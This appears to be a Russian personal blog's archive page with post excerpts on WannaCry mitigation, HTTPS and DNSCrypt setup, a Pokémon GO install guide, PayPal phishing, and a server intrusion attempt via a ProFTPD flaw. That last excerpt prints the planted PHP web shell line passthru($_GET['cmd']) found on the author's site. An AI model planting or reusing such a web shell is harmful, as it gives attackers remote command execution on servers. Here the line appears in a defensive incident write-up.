Архив рубрики: Интернет

Как обезопасить свой компьютер от вируса-шифровальщика Wana decrypt0r 2.0 (WannaCry)

12 мая 2017 года началась глобальная атака на компьютеры под управлением операционной системы Microsoft Windows. При этом используется уязвимость EternalBlue MS17-010 в сетевом протоколе SMBv1. В случае успешного проникновения на компьютер пользователя вирус WannaCry шифрует файлы на компьютере и вымогает биткойны ($300 в эквиваленте) (командные центры вируса расположены в сети  Tor).
Для предотвращения проникновения вируса-вымогателя (ransomware) на свой компьютер Вы может отключить сетевой протокол SMBv1 командой (вводится в командной строке):

dism /online /norestart /disable-feature /featurename:SMB1Protocol

Результаты выполнения команды:

Voilà 🙂

Тонкая настройка HTTPS на Apache — Forward Secrecy , RC4 , SSL 3 и все-все-все

Всеобщая мода на HTTPS захватила таки и меня. Я перевел свои сайты на https:// (посредством бесплатного сертификата от Let’s Encrypt) и решил оценить их качество, проверив с помощью бесплатного сервиса SSL Server Test https://www.ssllabs.com/ssltest/

Я ввел адрес acdc.foxylab.com (Hostname), нажал кнопку «Submit«, подождал несколько минут и результат …… меня немного удивил:
Моему сайту была выставлена невысокая оценка C (при том, что высшая оценка — A+).
Разберемся, как же улучшить оценку на примере моего сервера Apache под управлением операционной системы Ubuntu.
Читать далее

Шифруем DNS-запросы или dnscrypt-proxy в действии — НЕТ утечке DNS

Протокол DNS предполагает открытый обмен информацией между клиентами (в число которых входит и Ваш компьютер) и DNS-серверами. Таким образом, «подсмотреть» адреса посещаемых Вами сайтов (утечка DNS, «DNS Leak«) или даже подменить их (!) не составляет особенного труда, даже при использовании VPN.

Например, рассмотрим информацию, передаваемую при запросе IP-адреса сайта ya.ru у DNS-серверов Google 8.8.8.8 и 8.8.4.4 при выполнении команды ping:

Перехватываем сетевые пакеты — происходит обращение к порту 53 по IP-адресам 8.8.8.8 и 8.8.4.4:

Смотрим содержимое запроса:
Имя сайта (ya.ru) содержится в запросе открытым текстом:
0x02 (2 символа) 0x79 (y) 0x61 (a) 0x02 (2 символа) 0x72 (r) 0x75 (u) 0x00 (конец)

Как же скрыть эту информацию от посторонних глаз? Протокол DNSCrypt (криптографическая защита DNS-трафика) нам поможет 🙂

Читать далее

Pokemon GO в Гомеле

Pokemon GO в Гомеле
Вашему вниманию предлагается небольшое руководство («гайд»)  по игре с дополненной реальностью Pokémon GO (ポケモンGO).
Будьте осторожны и осмотрительны во время игры!

Установка игры

Беларусь и Россия не входят в число стран, где игра Pokémon GO официально запущена:
     ヨーロッパ  
При попытке установки игры из магазина приложений Google Play выдается предупреждение:
Pokemon GO в Беларуси
Но поиграть в Pokemon GO на смартфоне под управлением операционной системы Android в Гомеле можно и сейчас. Для этого игру нужно установить с помощью установочного пакета (apk-файла) — свежие версии (сейчас самая новая версия — 0.49.1, объем около 80 МБайт) доступны на http://www.apkmirror.com/apk/niantic-inc/pokemon-go/ :
загрузка Pokemon GO в Беларуси
(нажать кнопку со стрелкой для скачивания).
Не скачивайте игру из непроверенных источников из-за возможности заражения Вашего смартфона вредоносными программами!

Читать далее

Ferdinand vs TVP VTU (17.06.16)

В тыл самоходке зашел шустрый противник… Он уйдет безнаказанно? Отнюдь… у нас есть гусеницы, десятки тонн массы и мощный мотор… И здание на нашей стороне 🙂 Ну и союзнику на «Чаффи» опять же веселье 🙂World of Tanks

Как воруют пароли от PayPal

Социальная инженерия — сильная штука, и ее злонамеренное использование может привести к утрате Вами пароля от Вашего аккаунта PayPal. В один прекрасный день (утром 18 октября 2015 года) я получил такое письмо:
воровство аккаунта PayPal

Читать далее

Попытка взлома моего сервера через уязвимость CVE: 2015-3306 в ProFTPD

В один прекрасный день я обнаружил в корневой директории одного из моих сайтов файл со странным именем d.php:
d.php

Помня, что такой файл я не создавал, я решил посмотреть его содержимое:
d.php
passthru($_GET['cmd']);echo 'm3rg3'; — очень занятно.
Код passthru($_GET['cmd']); позволяет выполнять команды с привилегиями сервера, cmd — имя переменной, в которой передается методом GET выполняемый код

213.92.207.124 — IP-адрес из диапазона польского провайдера Polprint.

Посмотрим в логи сервера ProFTPD, упомянутого в этом файле, и поищем что же там есть за этот айпишник 🙂 :

Читать далее